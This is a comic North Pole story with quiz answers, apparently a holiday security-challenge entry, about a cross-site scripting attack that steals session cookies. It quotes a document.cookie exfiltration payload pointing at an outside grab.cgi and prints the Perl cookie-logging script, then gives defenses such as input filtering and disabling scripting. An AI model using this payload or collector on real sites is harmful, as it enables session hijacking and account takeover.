By Kenn Crook.Yes Virginia, there IS information security at the North Pole. It was late into the cold, cold night when
Hermey and Rudolph first noticed the attack in their web logs. Thinking quickly, but remaining calm, Hermey immediately pulled out his incident handling checklist while Rudolph, blaring away with his rosy
proboscis, flew off to notify Santa that there was trouble ahoof. At first, Hermey wasn't sure what kind of attack he was dealing with. He decided to do a Google search of what he felt were the most
important elements of the attack so that he might get a clue as to what this naughty intruder was doing. Firing up his trusty Linux desktop and entering [grab.cgi?'+document.cookie] into the search engine brought back
only 4 responses but they did look promising. They all mentioned a URL
http://peacefire.org/holder/grab.cgi?\" + bookmarklink\'While this wasn't exactly what Hermey saw in the web logs he
figured it was close enough for starters so he clicked on the link and read on. It seemed to be a demo of something called Cross-Site Scripting. Hmm... he'd never heard of that before. He bet that CERT (one of his
favorite sites) might have some useful information about this. Browsing over to CERT's site he came upon an advisory from February 2000 http://www.cert.org/advisories/CA-2000-02.html
about this sort of thing. In reading over the information as well as a few other articles on the subject Hermey was pretty sure he knew what was going on. Meanwhile, Santa was lamenting the news that Rudolph had given him.
"Tell Hermey to shut this little 'darling' down. I want to know how it was done and I want to stop it from happening anymore. But for now, I'm going to go over the database records and see if anything has been
changed. After all... I know who's been naughty and nice" The jolly old elf stated. Rudolph flew back to the workshop where Hermey was burning the midnight oil.
"Santa says he wants this intruder shut down. Do you know what they're doing yet?" Rudolph inquired. "Sure do, Rudy. They were using a JavaScript XSS exploit to grab our cookies. After they got hold of
them they could log into a session and masquerade as us. We'd be, well, let's just say hanging out in the wind." Hermey told his four-legged friend. "What's that first thing, with the <IMG> tag?"
Rudolph inquired, covering his nose so that the red glare didn't make the screen unreadable. "Well, they could have tried to use that tag as an exploit as well with JavaScript, but it looks to me like they were
just seeing if our site was vulnerable to XSS. See, if they can put in a foreign URL and it get parsed like it was from this site... then you're vulnerable." Hermey shook his head. Who could do such a thing, he
thought. "Here, I found a nice PowerPoint by Ed Skoudis that sums up the whole XSS thing." he offered. "Ed Skoudis?" Rudolph asked, "Isn't he the author of
Malware: Fighting Malicious Code?" "Indeed he is Rudy, and don't forget Counter Hack." Hermey added, putting a copy of both books by his face and smiling to the 'camera'."So, what can we do to fix this?" Rudolph asked. "Well, first
off we need to disable JavaScript execution on all of our browsers while our Web-Elf gets the site re-coded. He needs to either not reflect back user input or filter it in such a way as to eliminate unintentional code
execution." Hermey stated. "And we should change the format of our cookies just to make sure that any that were stolen wouldn't still work here. Too bad we can't firewall off the intranet applications… but
with all the melting it causes…" Hermey said sadly, remembering the mess he'd caused awhile back with that sort of thing. "Luckily we have that magic pixie dust we purchased from those Big Blue Pixies. We
can just sprinkle some of that on our servers and the code will be fixed." Rudolph stated. "Yes, luckily". Hermey nodded.
Just then Santa burst in. "I have found our culprit!" He stated flatly. "REALLY? How???" Both Rudolph and Hermey would never cease to be amazed by the old elf.
"I went through all the database records..." "But there are like a billion..." Hermey interrupted. Santa quieted Hermey with a look that made the curl in his toes go temporarily limp.
"I KNOW how many there are... But if I can fly around the world and visit them in just one night, don't you think I'd be able to cross-reference a relational database pretty quickly?"
"Oh, yeah... good point Boss. Uhm... so, who was it, er is it?" Hermey stammered. "Here's the record, changed from "Lump of Coal" to "All expense paid vacation for 2 to Maui". Santa
stated, pointing to the difference between today's printout and one from a backup. "Kris Eebler!" Hermey exclaimed, looking at the name and address. "I always knew that elf was up to no good. And his
fascination with cookies, yes, it all makes sense! But that's not the address for the Little Tree that he and those 'defectors' of his used to live in." Hermey scratched his head. "No, quite right little
Hermey. The other elves in the Little Tree kicked him out. I just got off the phone with them. Apparently, he's gotten even more surly than when he lived here. He's living in some tenement housing and hitting the bottle
from what they say." Santa told them. "I've confirmed it!" Shouted Rudolph with glee, his nose approaching a near apocalyptic brightness. "I did a whois search on www.bumblesnowmonster.com
and here's what I get:
Registrant Organization Name:
Name: K. Eebler
Address: 3030 Low Rent Drive Kississime, FL 34744
US
Email Address: bitemesanta@bitterelves.com
Phone Number: 5553331234
Fax Number:
Administrative Contact Name: K. Eebler
Address: 3030 Low Rent Drive
Kississime, FL 34744
US
Email Address: bitemesanta@bitterelves.com
Phone Number: 5553331234
Fax Number:
Technical Contact Name: K. Eebler
Address: 3030 Low Rent Drive Kississime, FL 34744
US
Email Address: bitemesanta@bitterelves.com
Phone Number: 5553331234
Fax Number: Billing Contact
Name: K. Eebler
Address: 3030 Low Rent Drive Kississime, FL 34744
US
Email Address: bitemesanta@bitterelves.com
Phone Number: 5553331234
Fax Number:
Record Created on........ 2002-12-26 08:59:36.000
Record last updated on... 2002-12-26 15:08:18.000
Expire on................ 2003-12-26 00:00:00.000 Domain servers in listed order:
NS.BEST.COM 161.58.9.59
NS2.BEST.COM 161.58.9.11
NS3.BEST.COM 128.121.101.19
"Rudolph!" Santa bellowed. "Yes, sir!" Rudolph sprang to attention. "I want you to go and bring back this miscreant. We're going to show him some justice Santa-style. I'm going to let
him know what the North Pole is really used for..." Santa chuckled in a way that made everyone shiver... which is a hard thing to do when you're used to being that far North. Rudolph immediately sprang into the
air and flew towards Florida. Narrowly avoiding some late night fireworks over a nearby castle, Rudolph headed for the seedy side of Kississime. Finding no one home at 3030 Low Rent Drive, Rudolph flew down the air vent
(no chimney in sight) and into the 4th story apartment. There, downloading the incriminating evidence from the evil elf's FreeBSD computer (he'd left it logged in running nmap) he found the following script:
#!/usr/bin/perl
# grab.cgi $grabbed_cookie = $ENV{'QUERY_STRING'};
$grabbed_cookie =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
open(KEEBLER_LOG, ">>keebler_log") or print "Content-type:
text/html\n\n oop ack\n";
print KEEBLER_LOG "$grabbed_cookie\n";
print "Content-type: text/html\n\n";
close(KEEBLER_LOG);
Rudolph gazed across the filthy apartment looking for more clues as to where the misguided elf might be. Several empty containers of Egg Nog and cookie boxes were strewn about the room. Napkins, coasters and shot
glasses from a nearby snack bar were also littering the floor. Rudolph headed off to see if he could find Eebler there. Wrapping a towel around his nose, he flew down to the nearby snack bar and snuck up to the bar's
doorway to listen for that familiar, high-pitched voice. He could hear the elf harassing some young girl.
"Listen baby, I can get you off the Naughty List. C'mon, even Santa doesn't make candy as sweet as you." "No. Leave me alone!" she implored.
"Yeah, yeah... a thimbleful of Nog and I'm a wildman. Sorry, toots." Rudolph couldn't take it anymore. Magically creating the sound of Carl Orff's "O Fortuna" (every hero has to have theme music)
he burst into the bar, nose blazing. His shiny honker filled the room with an ominous, ruddy, evil-esque glow. Rudolph stood silhouetted in the doorway fuming at the cowering elf, "Come with me if you want to
live." he told Eebler offering the elf his hoof. Kris got to his feet and looked over at the girl he'd been harassing "You'd look great in a Raggedy Ann wig" he offered.
"Go!" she shouted, pointing toward the door. He thought about using some of his elfin magic to escape… but knew things would go worse for him when he was caught. Dejected, he returned with Rudolph to the
North Pole to face the music. After intense psychotherapy it was determined that the whole "Cookies and Milk for Santa" thing had thrown him over the edge. After his punishment was over (pole-sitting for a few
months along with those Big Blue Pixies whose dust didn't seem to work as advertised) he and Santa worked out an agreement that lowered Santa's carb intake and satisfied the elf's insatiable appetite for cookies.
The End.
What is the purpose of the first malicious wish text, and how does it work?
The first wish text was to confirm whether XSS was doable for Santa's new site. By seeing if the <IMG> tag was displayed as HTML when it was echoed back Eebler was able to determine that the site was prime for
XSS.
What is the purpose of the second malicious wish text, and how does it work?
Grabbing delicious cookies. Yum! By using JavaScript executed in the context of the user's browser it was able to write the contents of their cookies out to the cookie-loving elf's cgi script (see grab.cgi above).
How could Hermey and Rudolph thwart the first and second types of attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves'
browsers?
They could either not reflect user input as output in the web application and/or filter out all characters that are meaningful in scripting languages. Easiest to define characters (alpha numeric) that are okay and
filter everything else. Alternately, they could disable scripting support in their browsers, though this is problematic since a lot of legitimate sites use things like ActiveX, JavaScript and the like. However, if these
machines were dedicated for only this purpose and the browsers didn't need script execution then it should be disabled in any case.
Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks
by altering an e-mail reader's configuration?
Reading email in a non-HTML format (plain text) would be the best way. Another way would be to make sure that things like preview pane and the like are disabled so that code isn't automatically run. Using a client
that isn't intimately tied to the OS (i.e.. Anything but Outlook) will also go a long way towards mitigating these kinds of problems. Of course, disabling the aforementioned scripting capabilities in the client (which
very well might be a browser) will stop this as well. -Kenn Kenn Crook
|
|
